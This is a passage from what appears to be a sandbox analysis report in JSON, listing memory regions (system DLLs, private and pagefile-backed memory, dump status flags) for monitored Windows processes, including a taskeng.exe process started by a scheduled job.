"sechost.dll", "norm_filename": "c:\\windows\\system32\\sechost.dll", "region_type": "memory_mapped_file", "start_va": 8791787241472, "timestamp": "00:02:07.791", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 880640, "start_va": 8791787372544, "type": "region", "version": 1 }, "end_va": 8791788253183, "entry_point": 8791787385460, "filename": "\\Windows\\System32\\oleaut32.dll", "id": "region_1627", "name": "oleaut32.dll", "norm_filename": "c:\\windows\\system32\\oleaut32.dll", "region_type": "memory_mapped_file", "start_va": 8791787372544, "timestamp": "00:02:07.792", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 4096, "start_va": 8791790059520, "type": "region", "version": 1 }, "end_va": 8791790063615, "entry_point": 8791790059520, "filename": "\\Windows\\System32\\apisetschema.dll", "id": "region_1628", "name": "apisetschema.dll", "norm_filename": "c:\\windows\\system32\\apisetschema.dll", "region_type": "memory_mapped_file", "start_va": 8791790059520, "timestamp": "00:02:07.792", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 143360, "start_va": 8796092694528, "type": "region", "version": 1 }, "end_va": 8796092837887, "entry_point": 0, "filename": null, "id": "region_1629", "name": "pagefile_0x000007fffffb0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 8796092694528, "timestamp": "00:02:07.794", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 8796092837888, "type": "region", "version": 1 }, "end_va": 8796092846079, "entry_point": 0, "filename": null, "id": "region_1630", "name": "private_0x000007fffffd3000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092837888, "timestamp": "00:02:07.794", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 8796092846080, "type": "region", "version": 1 }, "end_va": 8796092850175, "entry_point": 0, "filename": null, "id": "region_1631", "name": "private_0x000007fffffd5000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092846080, "timestamp": "00:02:07.794", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 8796092850176, "type": "region", "version": 1 }, "end_va": 8796092858367, "entry_point": 0, "filename": null, "id": "region_1632", "name": "private_0x000007fffffd6000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092850176, "timestamp": "00:02:07.794", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 8796092858368, "type": "region", "version": 1 }, "end_va": 8796092866559, "entry_point": 0, "filename": null, "id": "region_1633", "name": "private_0x000007fffffd8000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092858368, "timestamp": "00:02:07.794", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 8796092866560, "type": "region", "version": 1 }, "end_va": 8796092874751, "entry_point": 0, "filename": null, "id": "region_1634", "name": "private_0x000007fffffda000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092866560, "timestamp": "00:02:07.794", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 8796092874752, "type": "region", "version": 1 }, "end_va": 8796092882943, "entry_point": 0, "filename": null, "id": "region_1635", "name": "private_0x000007fffffdc000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092874752, "timestamp": "00:02:07.794", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 8796092882944, "type": "region", "version": 1 }, "end_va": 8796092891135, "entry_point": 0, "filename": null, "id": "region_1636", "name": "private_0x000007fffffde000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092882944, "timestamp": "00:02:07.794", "type": "region", "version": 1 } ], "terminate_reason": "timeout", "type": "monitored_process", "unmonitor_reason": "terminated_by_timeout", "version": 1 }, { "cmd_line": "taskeng.exe {33F40472-7093-4C44-9E45-95E720A6D75F} S-1-5-18:NT AUTHORITY\\System:Service:", "filename": "c:\\windows\\system32\\taskeng.exe", "id": "proc_11", "image_name": "taskeng.exe", "monitor_reason": "created_scheduled_job", "monitored_id": 11, "origin_monitor_id": 8, "ref_parent_process": { "ref_id": "proc_8", "ref_source": "summary", "ref_type": "monitored_process", "type": "reference", "version": 1 }, "regions": [ { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 131071, "entry_point": 0, "filename": null, "id": "region_1505", "name": "pagefile_0x0000000000010000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 65536, "timestamp": "00:02:07.571", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 28672, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 159743, "entry_point": 0, "filename": null, "id": "region_1506", "name": "pagefile_0x0000000000020000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 131072, "timestamp": "00:02:07.571", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 524288, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 720895, "entry_point": 0, "filename": null, "id": "region_1507", "name": "private_0x0000000000030000", "norm_filename": null, "region_type": "private_memory", "start_va": 196608, "timestamp": "00:02:07.572", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 720896, "type": "region", "version": 1 }, "end_va": 737279, "entry_point": 0, "filename": null, "id": "region_1508", "name": "pagefile_0x00000000000b0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 720896, "timestamp": "00:02:07.572", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 786432, "type": "region", "version": 1 }, "end_va": 790527, "entry_point": 0, "filename": null, "id": "region_1509", "name": "pagefile_0x00000000000c0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 786432, "timestamp": "00:02:07.572", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 851968, "type": "region", "version": 1 }, "end_va": 860159, "entry_point": 0, "filename": null, "id": "region_1510", "name": "pagefile_0x00000000000d0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 851968, "timestamp": "00:02:07.572", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 917504, "type": "region", "version": 1 }, "end_va": 983039, "entry_point": 0, "filename": null, "id": "region_1511", "name": "private_0x00000000000e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 917504, "timestamp": "00:02:07.572", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 983040, "type": "region", "version": 1 }, "end_va": 987135, "entry_point": 0, "filename": null, "id": "region_1512", "name": "private_0x00000000000f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 983040, "timestamp": "00:02:07.572", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 1048576, "type": "region", "version": 1 }, "end_va": 2097151, "entry_point": 0, "filename": null, "id": "region_1513", "name": "private_0x0000000000100000", "norm_filename": null, "region_type": "private_memory", "start_va": 1048576, "timestamp": "00:02:07.572", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 421888, "start_va": 2097152, "type": "region", "version": 1 }, "end_va": 2519039, "entry_point": 2097152, "filename": "\\Windows\\System32\\locale.nls", "id": "region_1514", "name": "locale.nls", "norm_filename": "c:\\windows\\system32\\locale.nls", "region_type": "memory_mapped_file", "start_va": 2097152, "timestamp": "00:02:07.572", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2555904, "type": "region", "version": 1 }, "end_va": 3604479, "entry_point": 0, "filename": null, "id": "region_1515", "name": "private_0x0000000000270000", "norm_filename": null, "region_type": "private_memory", "start_va": 2555904, "timestamp": "00:02:07.572", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1605632, "start_va": 3604480, "type": "region", "version": 1 }, "end_va": 5210111, "entry_point": 0, "filename": null, "id": "region_1516", "name": "pagefile_0x0000000000370000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 3604480, "timestamp": "00:02:07.572", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1576960, "start_va": 5242880, "type": "region", "version": 1 }, "end_va": 6819839, "entry_point": 0, "filename": null, "id": "region_1517", "name": "pagefile_0x0000000000500000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 5242880, "timestamp": "00:02:07.572", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 786432, "start_va": 6881280, "type": "region", "version": 1 }, "end_va": 7667711, "entry_point": 0, "filename": null, "id": "region_1518", "name": "pagefile_0x0000000000690000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 6881280, "timestamp": "00:02:07.572", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4141056, "start_va": 7667712, "type": "region", "version": 1 }, "end_va": 11808767, "entry_point": 0, "filename": null, "id": "region_1519", "name": "pagefile_0x0000000000750000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 7667712, "timestamp": "00:02:07.572", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 11862016, "type": "region", "version": 1 }, "end_va": 11866111, "entry_point": 0, "filename": null, "id": "region_1520", "name": "private_0x0000000000b50000", "norm_filename": null, "region_type": "private_memory", "start_va": 11862016, "timestamp": "00:02:07.572", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 11927552, "type": "region", "version": 1 }, "end_va": 12976127, "entry_point": 0, "filename": null, "id": "region_1521", "name": "private_0x0000000000b60000", "norm_filename": null, "region_type": "private_memory", "start_va": 11927552, "timestamp": "00:02:07.572", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 12976128, "type": "region", "version": 1 }, "end_va": 12980223, "entry_point": 0, "filename": null, "id": "region_1522", "name": "pagefile_0x0000000000c60000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 12976128, "timestamp": "00:02:07.572", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 524288, "start_va": 13238272, "type": "region", "version": 1 }, "end_va": 13762559, "entry_point": 0, "filename": null, "id": "region_1523", "name": "private_0x0000000000ca0000", "norm_filename": null, "region_type": "private_memory", "start_va": 13238272, "timestamp": "00:02:07.572", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 524288, "start_va": 13959168, "type": "region", "version": 1 }, "end_va": 14483455, "entry_point": 0, "filename": null, "id": "region_1524", "name": "private_0x0000000000d50000", "norm_filename": null, "region_type": "private_memory", "start_va": 13959168, "timestamp": "00:02:07.572", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 524288, "start_va": 14876672, "type": "region", "version": 1 }, "end_va": 15400959, "entry_point": 0, "filename": null, "id": "region_1525", "name": "private_0x0000000000e30000", "norm_filename": null, "region_type": "private_memory", "start_va": 14876672, "timestamp": "00:02:07.572", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 524288, "start_va": 16187392, "type": "region", "version": 1 }, "end_va": 16711679, "entry_point": 0, "filename": null, "id": "region_1526", "name": "private_0x0000000000f70000", "norm_filename": null, "region_type": "private_memory", "start_va": 16187392, "timestamp": "00:02:07.572", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 524288, "start_va": 16908288, "type": "region", "version": 1 }, "end_va": 17432575, "entry_point": 0, "filename": null, "id": "region_1527", "name": "private_0x0000000001020000", "norm_filename": null, "region_type": "private_memory", "start_va": 16908288, "timestamp": "00:02:07.572", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 2945024, "start_va": 17498112, "type": "region", "version": 1 }, "end_va": 20443135, "entry_point": 17498112, "filename": "\\Windows\\Globalization\\Sorting\\SortDefault.nls", "id": "region_1528", "name": "sortdefault.nls", "norm_filename": "c:\\windows\\globalization\\sorting\\sortdefault.nls", "region_type": "memory_mapped_file", "start_va": 17498112, "timestamp": "00:02:07.572", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 524288, "start_va": 21430272, "type": "region", "version": 1 }, "end_va": 21954559, "entry_point": 0, "filename": null, "id": "region_1529", "name": "private_0x0000000001470000", "norm_filename": null, "region_type": "private_memory", "start_va": 21430272, "timestamp": "00:02:07.573", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1175552, "start_va": 1999765504, "type": "region", "version": 1 }, "end_va": 2000941055, "entry_point": 1999855264, "filename": "\\Windows\\System32\\kernel32.dll", "id": "region_1530", "name": "kernel32.dll", "norm_filename": "c:\\windows\\system32\\kernel32.dll", "region_type": "memory_mapped_file", "start_va": 1999765504, "timestamp": "00:02:07.573", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1024000, "start_va": 2000945152, "type": "region", "version": 1 }, "end_va": 2001969151, "entry_point": 2001052360, "filename": "\\Windows\\System32\\user32.dll", "id": "region_1531", "name": "user32.dll", "norm_filename": "c:\\windows\\system32\\user32.dll", "region_type": "memory_mapped_file", "start_va": 2000945152, "timestamp": "00:02:07.573", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1740800, "start_va": 2001993728, "type": "region", "version": 1 }, "end_va": 2003734527, "entry_point": 2001993728, "filename": "\\Windows\\System32\\ntdll.dll", "id": "region_1532", "name": "ntdll.dll", "norm_filename": "c:\\windows\\system32\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 2001993728, "timestamp": "00:02:07.574", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2131623935, "entry_point": 0, "filename": null, "id": "region_1533", "name": "pagefile_0x000000007efe0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130575360, "timestamp": "00:02:07.574", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 15728640, "start_va": 2131623936, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_1534", "name": "private_0x000000007f0e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2131623936, "timestamp": "00:02:07.575", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable" ], "ref_process_dump": null, "size": 65536, "start_va": 2147352576, "type": "region", "version": 1 }, "end_va": 2147418111, "entry_point": 0, "filename": null, "id": "region_1535", "name": "private_0x000000007ffe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147352576, "timestamp": "00:02:07.575", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 475136, "start_va": 4293066752, "type": "region", "version": 1 }, "end_va": 4293541887, "entry_point": 4293066752, "filename": "\\Windows\\System32\\taskeng.exe", "id": "region_1536", "name": "taskeng.exe", "norm_filename": "c:\\windows\\system32\\taskeng.exe", "region_type": "memory_mapped_file", "start_va": 4293066752, "timestamp": "00:02:07.575", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 36864, "start_va": 8791631527936, "type": "region", "version": 1 }, "end_va": 8791631564799, "entry_point": 8791631527936, "filename": "\\Windows\\System32\\TSChannel.dll", "id": "region_1537", "name": "tschannel.dll", "norm_filename": "c:\\windows\\system32\\tschannel.dll", "region_type": "memory_mapped_file", "start_va": 8791631527936, "timestamp": "00:02:07.583", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 217088, "start_va": 8791717838848, "type": "region", "version": 1 }, "end_va": 8791718055935, "entry_point": 8791717838848, "filename": "\\Windows\\System32\\xmllite.dll", "id": "region_1538", "name": "xmllite.dll", "norm_filename": "c:\\windows\\system32\\xmllite.dll", "region_type": "memory_mapped_file", "start_va": 8791717838848, "timestamp": "00:02:07.606", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 40960, "start_va": 8791718100992, "type": "region", "version": 1 }, "end_va": 8791718141951, "entry_point": 8791718100992, "filename": "\\Windows\\System32\\ktmw32.dll", "id": "region_1539", "name": "ktmw32.dll", "norm_filename": "c:\\windows\\system32\\ktmw32.dll", "region_type": "memory_mapped_file", "start_va": 8791718100992, "timestamp": "00:02:07.616", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 290816, "start_va": 8791741825024, "type": "region", "version": 1 }, "end_va": 8791742115839, "entry_point": 8791741829220, "filename": "\\Windows\\System32\\rsaenh.dll", "id": "region_1540", "name": "rsaenh.dll", "norm_filename": "c:\\windows\\system32\\rsaenh.dll", "region_type": "memory_mapped_file", "start_va": 8791741825024, "timestamp": "00:02:07.624", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 94208, "start_va": 8791746347008, "type": "region", "version": 1 }, "end_va": 8791746441215, "entry_point": 8791746359992, "filename": "\\Windows\\System32\\cryptsp.dll", "id": "region_1541", "name": "cryptsp.dll", "norm_filename": "c:\\windows\\system32\\cryptsp.dll", "region_type": "memory_mapped_file", "start_va": 8791746347008, "timestamp": "00:02:07.625", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 446464, "start_va": 8791747395584, "type": "region", "version": 1 }, "end_va": 8791747842047, "entry_point": 8791747395584, "filename": "\\Windows\\System32\\wevtapi.dll", "id": "region_1542", "name": "wevtapi.dll", "norm_filename": "c:\\windows\\system32\\wevtapi.dll", "region_type": "memory_mapped_file", "start_va": 8791747395584, "timestamp": "00:02:07.625", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 151552, "start_va": 8791751196672, "type": "region", "version": 1 }, "end_va": 8791751348223, "entry_point": 8791751235160, "filename": "\\Windows\\System32\\sspicli.dll", "id": "region_1543", "name": "sspicli.dll", "norm_filename": "c:\\windows\\system32\\sspicli.dll", "region_type": "memory_mapped_file", "start_va": 8791751196672, "timestamp": "00:02:07.643", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 61440, "start_va": 8791751393280, "type": "region", "version": 1 }, "end_va": 8791751454719, "entry_point": 8791751397392, "filename": "\\Windows\\System32\\cryptbase.dll", "id": "region_1544", "name": "cryptbase.dll", "norm_filename": "c:\\windows\\system32\\cryptbase.dll", "region_type": "memory_mapped_file", "start_va": 8791751393280, "timestamp": "00:02:07.643", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 81920, "start_va": 8791752376320, "type": "region", "version": 1 }, "end_va": 8791752458239, "entry_point": 8791752380640, "filename": "\\Windows\\System32\\RpcRtRemote.dll", "id": "region_1545", "name": "rpcrtremote.dll", "norm_filename": "c:\\windows\\system32\\rpcrtremote.dll", "region_type": "memory_mapped_file", "start_va": 8791752376320, "timestamp": "00:02:07.643", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 438272, "start_va": 8791754539008, "type": "region", "version": 1 }, "end_va": 8791754977279, "entry_point": 8791754551520, "filename": "\\Windows\\System32\\KernelBase.dll", "id": "region_1546", "name": "kernelbase.dll", "norm_filename": "c:\\windows\\system32\\kernelbase.dll", "region_type": "memory_mapped_file", "start_va": 8791754539008, "timestamp": "00:02:07.644", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1232896, "start_va": 8791756505088, "type": "region", "version": 1 }, "end_va": 8791757737983, "entry_point": 8791756827984, "filename": "\\Windows\\System32\\rpcrt4.dll", "id": "region_1547", "name": "rpcrt4.dll", "norm_filename": "c:\\windows\\system32\\rpcrt4.dll", "region_type": "memory_mapped_file", "start_va": 8791756505088, "timestamp": "00:02:07.644", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 626688, "start_va": 8791757750272, "type": "region", "version": 1 }, "end_va": 8791758376959, "entry_point": 8791757757456, "filename": "\\Windows\\System32\\clbcatq.dll", "id": "region_1548", "name": "clbcatq.dll", "norm_filename": "c:\\windows\\system32\\clbcatq.dll", "region_type": "memory_mapped_file", "start_va": 8791757750272, "timestamp": "00:02:07.645", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 188416, "start_va": 8791758405632, "type": "region", "version": 1 }, "end_va": 8791758594047, "entry_point": 8791758409744, "filename": "\\Windows\\System32\\imm32.dll", "id": "region_1549", "name": "imm32.dll", "norm_filename": "c:\\windows\\system32\\imm32.dll", "region_type": "memory_mapped_file", "start_va": 8791758405632, "timestamp": "00:02:07.645", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 897024, "start_va": 8791759257600, "type": "region", "version": 1 }, "end_va": 8791760154623, "entry_point": 8791759390560, "filename": "\\Windows\\System32\\advapi32.dll", "id": "region_1550", "name": "advapi32.dll", "norm_filename": "c:\\windows\\system32\\advapi32.dll", "region_type": "memory_mapped_file", "start_va": 8791759257600, "timestamp": "00:02:07.645", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 421888, "start_va": 8791761747968, "type": "region", "version": 1 }, "end_va": 8791762169855, "entry_point": 8791761793084, "filename": "\\Windows\\System32\\gdi32.dll", "id": "region_1551", "name": "gdi32.dll", "norm_filename": "c:\\windows\\system32\\gdi32.dll", "region_type": "memory_mapped_file", "start_va": 8791761747968, "timestamp": "00:02:07.646", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1085440, "start_va": 8791762206720, "type": "region", "version": 1 }, "end_va": 8791763292159, "entry_point": 8791762210916, "filename": "\\Windows\\System32\\msctf.dll", "id": "region_1552", "name": "msctf.dll", "norm_filename": "c:\\windows\\system32\\msctf.dll", "region_type": "memory_mapped_file", "start_va": 8791762206720, "timestamp": "00:02:07.646", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 823296, "start_va": 8791763320832, "type": "region", "version": 1 }, "end_va": 8791764144127, "entry_point": 8791763822708, "filename": "\\Windows\\System32\\usp10.dll", "id": "region_1553", "name": "usp10.dll", "norm_filename": "c:\\windows\\system32\\usp10.dll", "region_type": "memory_mapped_file", "start_va": 8791763320832, "timestamp": "00:02:07.647", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 651264, "start_va": 8791778394112, "type": "region", "version": 1 }, "end_va": 8791779045375, "entry_point": 8791778403744, "filename": "\\Windows\\System32\\msvcrt.dll", "id": "region_1554", "name": "msvcrt.dll", "norm_filename": "c:\\windows\\system32\\msvcrt.dll", "region_type": "memory_mapped_file", "start_va": 8791778394112, "timestamp": "00:02:07.647", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": 